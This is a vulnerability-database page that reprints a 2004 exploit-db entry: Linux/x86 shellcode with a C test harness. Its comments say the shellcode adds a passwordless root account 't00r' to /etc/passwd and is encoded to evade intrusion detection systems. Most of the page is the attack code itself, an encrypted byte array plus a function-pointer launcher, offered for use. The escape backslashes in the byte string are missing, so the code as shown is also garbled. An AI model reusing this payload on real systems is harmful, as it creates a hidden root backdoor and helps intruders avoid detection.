Linux/x86 – Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)

Linux/x86 – Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)

漏洞ID 1054689 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-Linux/x86 – Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13428
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * !!!!!! ANTI IDS SHELLCODE !!!!!!
 *
 * [email protected]
 * 0x14abril0x7d2
 *
 * !!!!! ENCRIPTADA !!!!!

 * 116 bytes	
 * Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd

 * !!!!! ENCRIPTADA !!!!!
 *
 * Para mas informacion
 * Descargue http://www.shellcode.com.ar/Projects/JempiScodes(version).tgz
 *
 * !!!!!! ANTI IDS SHELLCODE !!!!!!
*/

#include <stdio.h>

char shellcode[]=
"xebx1bx5fx31xc0x6ax28x6ax52x59x49x5bx8ax04x0f"
"xf6xd3x30xd8x88x04x0fx50x85xc9x75xefxebx05xe8"
"xe0xffxffxffx0ex6fxc7xe4xffxfbxecxf3xf4xb3xa0"
"xeexf6xb8xffxb5xeex02x95x91x3axb5x70x32xbax37"
"xb2xf6xb5xbbxb2x04x07x86x5cx21xb2x2exc6xf9xbe"
"xa3xe4xffxadxeaxb2xf4xfexa7xf5xffxeaxb8xadxff"
"xf5xf5xadxe3xbbxffxbdx3fx59x66x33xbax72x97xd3"
"xb2x4ex0ex8fx49x34xb2x3fx72xb2x57";

main() {
        int *ret;
        ret=(int *)&ret+2;
        printf("Shellcode lenght=%dn",strlen(shellcode));
        (*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-26]

相关推荐: iHTML Merchant Feedback Form Security Vulnerability

iHTML Merchant Feedback Form Security Vulnerability 漏洞ID 1104556 漏洞类型 Input Validation Error 发布时间 1999-09-28 更新时间 1999-09-28 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享